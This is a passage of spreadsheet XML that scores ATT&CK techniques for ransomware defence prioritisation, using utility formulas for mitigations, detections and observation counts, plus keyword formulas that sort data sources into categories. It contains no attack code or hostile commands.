        <v>7</v>
      </c>
      <c r="X294" s="37">
        <v>0.127273</v>
      </c>
      <c r="Y294" s="37">
        <v>0.127273</v>
      </c>
      <c r="Z294" s="37">
        <v>3</v>
      </c>
      <c r="AA294" s="37">
        <v>0.03</v>
      </c>
      <c r="AB294" s="37">
        <v>0.03</v>
      </c>
      <c r="AC294" s="37"/>
      <c r="AD294" s="50" t="s">
        <v>1036</v>
      </c>
      <c r="AE294" s="37" t="str" cm="1">
        <f t="array" ref="AE294">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD294)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF294" s="37">
        <v>290</v>
      </c>
      <c r="AG294" s="37" t="str" cm="1">
        <f t="array" ref="AG294">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD294)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH294" s="37">
        <v>290</v>
      </c>
      <c r="AI294" s="37" t="str" cm="1">
        <f t="array" ref="AI294">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD294)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ294" s="37">
        <v>290</v>
      </c>
      <c r="AK294" s="37" t="str" cm="1">
        <f t="array" ref="AK294">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD294)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL294" s="37">
        <v>290</v>
      </c>
      <c r="AM294" s="37" t="str" cm="1">
        <f t="array" ref="AM294">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD294)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN294" s="37">
        <v>0</v>
      </c>
      <c r="AO294" s="37">
        <v>1</v>
      </c>
      <c r="AP294" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="AQ294" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>70.028626714285721</v>
      </c>
      <c r="AR294" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS294" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AT294" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AU29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1.6911577789115644</v>
      </c>
    </row>
    <row r="295" spans="1:47" ht="85">
      <c r="A295" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.43333333333333335</v>
      </c>
      <c r="B295" s="37">
        <f t="shared" si="4"/>
        <v>429.98958926190471</v>
      </c>
      <c r="C295" s="37" t="s">
        <v>1037</v>
      </c>
      <c r="D295" s="50" t="s">
        <v>1038</v>
      </c>
      <c r="E295" s="37"/>
      <c r="F295" s="37">
        <v>1</v>
      </c>
      <c r="G295" s="37">
        <v>0</v>
      </c>
      <c r="H295" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.05</v>
      </c>
      <c r="I295" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J295" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K295" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0</v>
      </c>
      <c r="L295" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0</v>
      </c>
      <c r="M295" s="37">
        <v>4.2299999999999998E-5</v>
      </c>
      <c r="N295" s="56">
        <v>0</v>
      </c>
      <c r="O295" s="56">
        <v>10</v>
      </c>
      <c r="P295" s="56">
        <v>8</v>
      </c>
      <c r="Q295" s="56">
        <v>19</v>
      </c>
      <c r="R295" s="57" t="s">
        <v>1039</v>
      </c>
      <c r="S295" s="57">
        <v>5</v>
      </c>
      <c r="T295" s="57" t="s">
        <v>1040</v>
      </c>
      <c r="U295" s="57">
        <v>10</v>
      </c>
      <c r="V295" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.31904747619047619</v>
      </c>
      <c r="W295" s="37">
        <v>15</v>
      </c>
      <c r="X295" s="37">
        <v>0.272727</v>
      </c>
      <c r="Y295" s="37">
        <v>0.272727</v>
      </c>
      <c r="Z295" s="37">
        <v>37</v>
      </c>
      <c r="AA295" s="37">
        <v>0.37</v>
      </c>
      <c r="AB295" s="37">
        <v>0.37</v>
      </c>
      <c r="AC295" s="37"/>
      <c r="AD295" s="50" t="s">
        <v>1041</v>
      </c>
      <c r="AE295" s="37" t="str" cm="1">
        <f t="array" ref="AE295">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD295)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF295" s="37">
        <v>291</v>
      </c>
      <c r="AG295" s="37" t="str" cm="1">
        <f t="array" ref="AG295">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD295)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH295" s="37">
        <v>291</v>
      </c>
      <c r="AI295" s="37" t="str" cm="1">
        <f t="array" ref="AI295">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD295)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ295" s="37">
        <v>291</v>
      </c>
      <c r="AK295" s="37" t="str" cm="1">
        <f t="array" ref="AK295">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD295)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AL295" s="37">
        <v>291</v>
      </c>
      <c r="AM295" s="37" t="str" cm="1">
        <f t="array" ref="AM295">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD295)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN295" s="37">
        <v>0</v>
      </c>
      <c r="AO295" s="37">
        <v>4</v>
      </c>
      <c r="AP295" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.43333333333333335</v>
      </c>
      <c r="AQ295" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>143.32986308730156</v>
      </c>
      <c r="AR295" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS295" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0.19047619047619047</v>
      </c>
      <c r="AT295" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0.19047619047619047</v>
      </c>
      <c r="AU29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13.745701246409672</v>
      </c>
    </row>
    <row r="296" spans="1:47" ht="68">
      <c r="A296" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.8666666666666667</v>
      </c>
      <c r="B296" s="37">
        <f t="shared" si="4"/>
        <v>352.78571866666658</v>
      </c>
      <c r="C296" s="37" t="s">
        <v>1042</v>
      </c>
      <c r="D296" s="50" t="s">
        <v>1043</v>
      </c>
      <c r="E296" s="37"/>
      <c r="F296" s="37">
        <v>1</v>
      </c>
      <c r="G296" s="37">
        <v>0</v>
      </c>
      <c r="H296" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.05</v>
      </c>
      <c r="I296" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J296" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K296" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0</v>
      </c>
      <c r="L296" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0</v>
      </c>
      <c r="M296" s="37">
        <v>1.3689E-2</v>
      </c>
      <c r="N296" s="56">
        <v>0</v>
      </c>
      <c r="O296" s="56">
        <v>10</v>
      </c>
      <c r="P296" s="56">
        <v>1</v>
      </c>
      <c r="Q296" s="56">
        <v>7</v>
      </c>
      <c r="R296" s="57" t="s">
        <v>1039</v>
      </c>
      <c r="S296" s="57">
        <v>5</v>
      </c>
      <c r="T296" s="57" t="s">
        <v>1044</v>
      </c>
      <c r="U296" s="57">
        <v>11</v>
      </c>
      <c r="V296" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.23809519047619043</v>
      </c>
      <c r="W296" s="37">
        <v>16</v>
      </c>
      <c r="X296" s="37">
        <v>0.29090899999999997</v>
      </c>
      <c r="Y296" s="37">
        <v>0.29090899999999997</v>
      </c>
      <c r="Z296" s="37">
        <v>18</v>
      </c>
      <c r="AA296" s="37">
        <v>0.18</v>
      </c>
      <c r="AB296" s="37">
        <v>0.18</v>
      </c>
      <c r="AC296" s="37"/>
      <c r="AD296" s="50" t="s">
        <v>1045</v>
      </c>
      <c r="AE296" s="37" t="str" cm="1">
        <f t="array" ref="AE296">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD296)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF296" s="37">
        <v>292</v>
      </c>
      <c r="AG296" s="37" t="str" cm="1">
        <f t="array" ref="AG296">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD296)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AH296" s="37">
        <v>292</v>
      </c>
      <c r="AI296" s="37" t="str" cm="1">
        <f t="array" ref="AI296">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD296)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ296" s="37">
        <v>292</v>
      </c>
      <c r="AK296" s="37" t="str" cm="1">
        <f t="array" ref="AK296">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD296)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AL296" s="37">
        <v>292</v>
      </c>
      <c r="AM296" s="37" t="str" cm="1">
        <f t="array" ref="AM296">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD296)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN296" s="37">
        <v>0</v>
      </c>
      <c r="AO296" s="37">
        <v>17</v>
      </c>
      <c r="AP296" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.8666666666666667</v>
      </c>
      <c r="AQ296" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>117.59523955555552</v>
      </c>
      <c r="AR296" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS296" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0.80952380952380953</v>
      </c>
      <c r="AT296" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0.80952380952380953</v>
      </c>
      <c r="AU29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48.00283505820105</v>
      </c>
    </row>
    <row r="297" spans="1:47" ht="85">
      <c r="A297" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.6</v>
      </c>
      <c r="B297" s="37">
        <f t="shared" si="4"/>
        <v>695.53169057142861</v>
      </c>
      <c r="C297" s="37" t="s">
        <v>1046</v>
      </c>
      <c r="D297" s="50" t="s">
        <v>1047</v>
      </c>
      <c r="E297" s="37"/>
      <c r="F297" s="37">
        <v>1</v>
      </c>
      <c r="G297" s="37">
        <v>0</v>
      </c>
      <c r="H297" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.05</v>
      </c>
      <c r="I297" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J297" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K297" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0</v>
      </c>
      <c r="L297" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0</v>
      </c>
      <c r="M297" s="37">
        <v>0.19533200000000001</v>
      </c>
      <c r="N297" s="56">
        <v>0</v>
      </c>
      <c r="O297" s="56">
        <v>7</v>
      </c>
      <c r="P297" s="56">
        <v>6</v>
      </c>
      <c r="Q297" s="56">
        <v>14</v>
      </c>
      <c r="R297" s="57" t="s">
        <v>1048</v>
      </c>
      <c r="S297" s="57">
        <v>10</v>
      </c>
      <c r="T297" s="57" t="s">
        <v>1049</v>
      </c>
      <c r="U297" s="57">
        <v>13</v>
      </c>
      <c r="V297" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.3476191428571429</v>
      </c>
      <c r="W297" s="37">
        <v>23</v>
      </c>
      <c r="X297" s="37">
        <v>0.418182</v>
      </c>
      <c r="Y297" s="37">
        <v>0.418182</v>
      </c>
      <c r="Z297" s="37">
        <v>27</v>
      </c>
      <c r="AA297" s="37">
        <v>0.27</v>
      </c>
      <c r="AB297" s="37">
        <v>0.27</v>
      </c>
      <c r="AC297" s="37"/>
      <c r="AD297" s="50" t="s">
        <v>1050</v>
      </c>
      <c r="AE297" s="37" t="str" cm="1">
        <f t="array" ref="AE297">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD297)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF297" s="37">
        <v>293</v>
      </c>
      <c r="AG297" s="37" t="str" cm="1">
        <f t="array" ref="AG297">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD297)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH297" s="37">
        <v>293</v>
      </c>
      <c r="AI297" s="37" t="str" cm="1">
        <f t="array" ref="AI297">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD297)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ297" s="37">
        <v>293</v>
      </c>
      <c r="AK297" s="37" t="str" cm="1">
        <f t="array" ref="AK297">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD297)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL297" s="37">
        <v>293</v>
      </c>
      <c r="AM297" s="37" t="str" cm="1">
        <f t="array" ref="AM297">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD297)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN297" s="37">
        <v>0</v>
      </c>
      <c r="AO297" s="37">
        <v>9</v>
      </c>
      <c r="AP297" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.6</v>
      </c>
      <c r="AQ297" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>231.84389685714288</v>
      </c>
      <c r="AR297" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS297" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0.42857142857142855</v>
      </c>
      <c r="AT297" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0.42857142857142855</v>
      </c>
      <c r="AU29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49.895120755102042</v>
      </c>
    </row>
    <row r="298" spans="1:47" ht="51">
      <c r="A298" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.76666666666666661</v>
      </c>
      <c r="B298" s="37">
        <f t="shared" si="4"/>
        <v>733.53862738095233</v>
      </c>
      <c r="C298" s="37" t="s">
        <v>1051</v>
      </c>
      <c r="D298" s="50" t="s">
        <v>1052</v>
      </c>
      <c r="E298" s="37"/>
      <c r="F298" s="37">
        <v>2</v>
      </c>
      <c r="G298" s="37">
        <v>2</v>
      </c>
      <c r="H298" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.2</v>
      </c>
      <c r="I298" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.2</v>
      </c>
      <c r="J298" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.2</v>
      </c>
      <c r="K298" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.2</v>
      </c>
      <c r="L298" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.2</v>
      </c>
      <c r="M298" s="37">
        <v>5.1798999999999998E-2</v>
      </c>
      <c r="N298" s="56">
        <v>2</v>
      </c>
      <c r="O298" s="56">
        <v>18</v>
      </c>
      <c r="P298" s="56">
        <v>6</v>
      </c>
      <c r="Q298" s="56">
        <v>12</v>
      </c>
      <c r="R298" s="57" t="s">
        <v>1053</v>
      </c>
      <c r="S298" s="57">
        <v>8</v>
      </c>
      <c r="T298" s="57" t="s">
        <v>1054</v>
      </c>
      <c r="U298" s="57">
        <v>12</v>
      </c>
      <c r="V298" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.37142838095238095</v>
      </c>
      <c r="W298" s="37">
        <v>20</v>
      </c>
      <c r="X298" s="37">
        <v>0.36363600000000001</v>
      </c>
      <c r="Y298" s="37">
        <v>0.36363600000000001</v>
      </c>
      <c r="Z298" s="37">
        <v>38</v>
      </c>
      <c r="AA298" s="37">
        <v>0.38</v>
      </c>
      <c r="AB298" s="37">
        <v>0.38</v>
      </c>
      <c r="AC298" s="37"/>
      <c r="AD298" s="50" t="s">
        <v>1055</v>
      </c>
      <c r="AE298" s="37" t="str" cm="1">
        <f t="array" ref="AE298">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD298)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF298" s="37">
        <v>294</v>
      </c>
      <c r="AG298" s="37" t="str" cm="1">
        <f t="array" ref="AG298">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD298)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH298" s="37">
        <v>294</v>
      </c>
      <c r="AI298" s="37" t="str" cm="1">
        <f t="array" ref="AI298">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD298)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ298" s="37">
        <v>294</v>
      </c>
      <c r="AK298" s="37" t="str" cm="1">
        <f t="array" ref="AK298">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD298)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL298" s="37">
        <v>294</v>
      </c>
      <c r="AM298" s="37" t="str" cm="1">
        <f t="array" ref="AM298">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD298)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN298" s="37">
        <v>0</v>
      </c>
      <c r="AO298" s="37">
        <v>14</v>
      </c>
      <c r="AP298" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.76666666666666661</v>
      </c>
      <c r="AQ298" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>244.51287579365078</v>
      </c>
      <c r="AR298" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS298" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0.66666666666666663</v>
      </c>
      <c r="AT298" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0.66666666666666663</v>
      </c>
      <c r="AU29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81.837625264550255</v>
      </c>
    </row>
    <row r="299" spans="1:47" ht="51">
      <c r="A299" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B299" s="37">
        <f t="shared" si="4"/>
        <v>239.01173604761908</v>
      </c>
      <c r="C299" s="37" t="s">
        <v>1056</v>
      </c>
      <c r="D299" s="50" t="s">
        <v>1057</v>
      </c>
      <c r="E299" s="37"/>
      <c r="F299" s="37">
        <v>1</v>
      </c>
      <c r="G299" s="37">
        <v>0</v>
      </c>
      <c r="H299" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.05</v>
      </c>
      <c r="I299" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J299" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K299" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0</v>
      </c>
      <c r="L299" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0</v>
      </c>
      <c r="M299" s="37">
        <v>0</v>
      </c>
      <c r="N299" s="56">
        <v>0</v>
      </c>
      <c r="O299" s="56">
        <v>0</v>
      </c>
      <c r="P299" s="56">
        <v>0</v>
      </c>
      <c r="Q299" s="56">
        <v>2</v>
      </c>
      <c r="R299" s="57" t="s">
        <v>1039</v>
      </c>
      <c r="S299" s="57">
        <v>5</v>
      </c>
      <c r="T299" s="57" t="s">
        <v>1040</v>
      </c>
      <c r="U299" s="57">
        <v>10</v>
      </c>
      <c r="V299" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.15238080952380953</v>
      </c>
      <c r="W299" s="37">
        <v>15</v>
      </c>
      <c r="X299" s="37">
        <v>0.272727</v>
      </c>
      <c r="Y299" s="37">
        <v>0.272727</v>
      </c>
      <c r="Z299" s="37">
        <v>2</v>
      </c>
      <c r="AA299" s="37">
        <v>0.02</v>
      </c>
      <c r="AB299" s="37">
        <v>0.02</v>
      </c>
      <c r="AC299" s="37"/>
      <c r="AD299" s="50" t="s">
        <v>1058</v>
      </c>
      <c r="AE299" s="37" t="str" cm="1">
        <f t="array" ref="AE299">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD299)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF299" s="37">
        <v>295</v>
      </c>
      <c r="AG299" s="37" t="str" cm="1">
        <f t="array" ref="AG299">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD299)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AH299" s="37">
        <v>295</v>
      </c>
